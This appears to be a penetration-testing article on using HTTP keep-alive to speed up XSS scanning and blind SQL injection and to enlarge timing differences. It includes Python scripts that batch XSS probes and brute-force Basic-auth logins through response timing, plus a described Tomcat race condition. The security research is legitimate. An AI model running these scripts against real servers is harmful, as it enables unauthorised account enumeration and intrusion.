Before turning to unconventional methods of usage, I will describe how “keep-alive” is working. The process is utterly simple – in a connection, multiple requests are sent instead of just one, and multiple responses come from the server. The benefits are obvious: there is less time spent on establishing connection, less load on CPU and memory. The number of requests in a single connection is usually limited by settings of the server (in most cases, there are at least several dozen). The procedure for establishing a connection is universal.
- In case of HTTP/1.0, the first request must contain the header Connection: keep-alive.
If you are using ‘HTTP / 1.1’, there is no such header at all, but some servers will automatically close connections that are not declared as being persistent. Also, for example, an obstacle may be created by the header Expect: 100-continue. So, to avoid errors, it is recommended to forcibly add ‘keep-alive’ to every request.
- When ‘keep-alive’ connection is specified, the server will look for the end of the first request. If the request does not contain data, the end will be deemed to be CRLF (these are ‘\r\n’ control characters, but often just two ‘\n’ will also work fine). The request is considered empty if it has no headers ‘Content-Length’, ‘Transfer-Encoding’, and if these headers have zero or incorrect content. If they are available and have correct value, the end of request will be the last content byte of declared length.
- If, after the first request, there are additional data, the steps ‘1’ and ‘2’ will be repeated for them until there are no more correctly formed requests.
Sometimes, even after the correct completion of the request, ‘keep-alive’ does not run as it should due to some unknown “magical” characteristics of the server and the script, to which is addressed the request. In this case, a forced initialization of connection by first HEAD request may prove to be helpful.
Thirty by one or one by thirty?
No matter how funny it may sound, but the first and most obvious benefit is the ability to accelerate during certain types of web application scanning. Let’s review a simple example: we need to check a certain XSS vector in the application that includes ten scripts. Each script accepts three parameters.
I wrote the code for a small script in Python, which will run through all pages and check all parameters one by one, and then display the vulnerable scripts or parameters (let’s make four vulnerabilities) and time spent on scanning.
import socket, time, re print("\n\nScan is started...\n") s_time = time.time() for pg_n in range(0,10): for prm_n in range(0,3): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("host.test", 80)) req = "GET /page"+str(pg_n)+".php?param"+str(prm_n)+"=// HTTP/1.1\r\nHost: host.test\r\nConnection: close\r\n\r\n" s.send(req) res = s.recv(64000) pattern = "// <![CDATA[ alert('xzxzx" if res.find(pattern)!=-1: print("Vulnerable page"+str(pg_n)+":param"+str(prm_n)) s.close() print("\nTime: %s" % (time.time() - s_time))
Let's try to run it. As a result, the runtime was 0.690999984741.
Now, let's try to run the same thing, but with a remote resource. In this case, the result was 3.0490000248.
Not bad, but now we will try to use 'keep-alive'. We will rewrite this script so that it will send all thirty requests in one connection, and then it will parse the response to extract the required values.
import socket, time, re print("\n\nScan is started...\n") s_time = time.time() req = "" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("host.test", 80)) for pg_n in range(0,10): for prm_n in range(0,3): req += "GET /page"+str(pg_n)+".php?param"+str(prm_n)+"=alert('xzxzx:page"+str(pg_n)+":param"+str(prm_n)+":yzyzy') // ]]>HTTP/1.1\r\nHost: host.test\r\nConnection: keep-alive\r\n\r\n" req += "HEAD /page0.php HTTP/1.1\r\nHost: host.test\r\nConnection: close\r\n\r\n" s.send(req) # Timeout for correct keep-alive time.sleep(0.15) res = s.recv(640000000) pattern = "// <![CDATA[ alert('xzxzx" strpos = 0 if res.find(pattern)!=-1: for z in range(0,res.count(pattern)): strpos = res.find(pattern, strpos+1) print("Vulnerable "+res[strpos+21:strpos+33]) s.close() print("\nTime: %s" % (time.time() - s_time))
Let's try to run it locally. The result is 0.167000055313. When we run 'keep-alive' for remote resource, the result is 0.393999814987.
And all this despite the fact that I had to add 0.15 seconds to avoid any problems as a result of coding the request in Python. A very tangible difference, isn't it? And what if you had thousands of such pages?
Of course, the advanced products do not scan in a single stream, but the server settings may limit the number of allowed streams. In general, if you intelligently distribute the requests, the load under the persistent connection will be lower and the results will be obtained faster. Besides, the penetration testers may have different tasks, which often require custom scripts.
Shooting with injections
One such frequently faced routine task may be character by character examination of blind SQL injections. If we are not afraid for the server – and it is unlikely to "feel" worse than if you start to examine everything character by character or by using a binary search in multiple streams – then we can also use 'keep-alive' here to get maximum results with a minimum number of connections.
The operating principle is simple. We collect requests with all characters into a single packet and send it. If the responses contains a match with the condition 'true', then the only thing we need to do is to parse it in order to obtain the number for desired character by using the number of successful response.
Again, this can be useful, if the number of streams is limited or you cannot use other methods that accelerate the sorting of characters.
Because in case of 'keep-alive' connection the server does not wake up additional streams to handle the requests but methodically executes the requests in accordance with the queue, we can achieve lower latency between two requests. In certain circumstances, this could be useful to exploit logical errors of 'race condition' type. But is there anything that you can't do by using several parallel streams? Nevertheless, here is an example of exceptional situation that can occur only through 'keep-alive'.
Let's try to modify a file in Tomcat through a Java script:
Everything is OK, both the script and the server can see that the file was modified. And now we will add to our sequence a 'keep-alive' request to the content of the file before the request for change – the server does not want to put up with the betrayal.
The script (and the OS too, I should note) sees perfectly well that the file was modified. But the server… For another five seconds, Tomcat will display the previous value of the file before replacing it with the current one.
In a complex web application, this allows to achieve the "race": one part refers to the information from the server that has not been updated yet, while the other has already received the new values. Anyway, now you know what to look for.
How to stop time
Finally, I will give you a curious example of technique used to stop time. Or more precisely, to slow it down.
Let's take a look at the principle underlying the module 'mod_auth_basic' of 'Apache_httpd' server. The authorization of 'Basic' type goes like this: first, the system checks whether there is an account with the user name sent in the request. Next, if such account exists, the server computes a hash for transmitted password and checks it against the hash in the account. Computing hash requires some system resources, so the answer will come a couple of milliseconds later than in case when the username would have found no matches (in fact, the result is highly dependent on server configuration, its performance, and sometimes even on the location of the stars in the sky). If you could see the difference between requests, it would be possible to sort logins in the hope of getting those that are certainly available in the system. However, in case of regular requests, it is almost impossible to detect the difference even in the local network.
To increase the delay, you can send a longer password. In my case, during the transmission of a password, that was 500 characters long, the difference between time-outs increased to 25 milliseconds. In a direct connection, it may be actually exploited but, when accessing via the Internet, it is not good at all.
In this case, we can count on help coming from our favorite 'keep-alive' mode, in which all requests are executed in sequence, one after the other, and therefore, the total delay is multiplied by the number of requests in the connection. In other words, if we can send 100 requests in a single packet, then with a password, that is 500 characters long, the delay would increase up to 2.5 seconds. That would be enough for an error-free sorting of logins through remote access, not to mention the local network.
It is better when the last request in 'keep-alive' closes the connection by using the Connection: close. This allows us to avoid the unnecessary timeout of 5 seconds (depending on your settings), during which the server is waiting to continue the sequence. I jotted down a small script for this.
import socket, base64, time print("BASIC Login Bruteforce\n") logins = ("abc","test","adm","root","zzzzz") for login in logins: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("host.test", 80)) cred = base64.b64encode(login+":"+("a"*500)) payload = "HEAD /prvt/ HTTP/1.1\r\nHost: host.test\r\nAuthorization: Basic "+str(cred)+"\r\n\r\n" multipayload = payload * 100 start_time = time.time() s.send(multipayload) r = s.recv(640000) print("For "+login+" = %s sec" % (time.time() - start_time)) s.close()
Even in this case, it makes sense to always use HEAD to ensure the smooth running of entire sequence.
Let's run it!
That's what had to be proven – 'keep-alive' may be useful not only to accelerate but also to slow down the response. It is also possible that such a trick will give you a boost when comparing the strings or characters in web applications or simply to better track the timeouts of any transactions.
In fact, the range of using persistent connections is much broader. With such connections, some servers start to behave not as usual, and you can stumble upon interesting logical errors in the architecture or catch funny bugs. Overall, this is a useful tool that you can keep in your arsenal for regular use. Stay tuned!
A few words from the author
In my daily work, I mostly use BurpSuite. However, for a real operation, it is much easier to jot down a simple script in any convenient language. I should also note that the mechanisms of establishing connections in different languages give surprisingly different results for different servers. For example, Python sockets were unable to properly bruteforce Apache httpd 2.4, but they do a wonderful job on version 2.2. So, if something doesn't work, it is worth trying another client.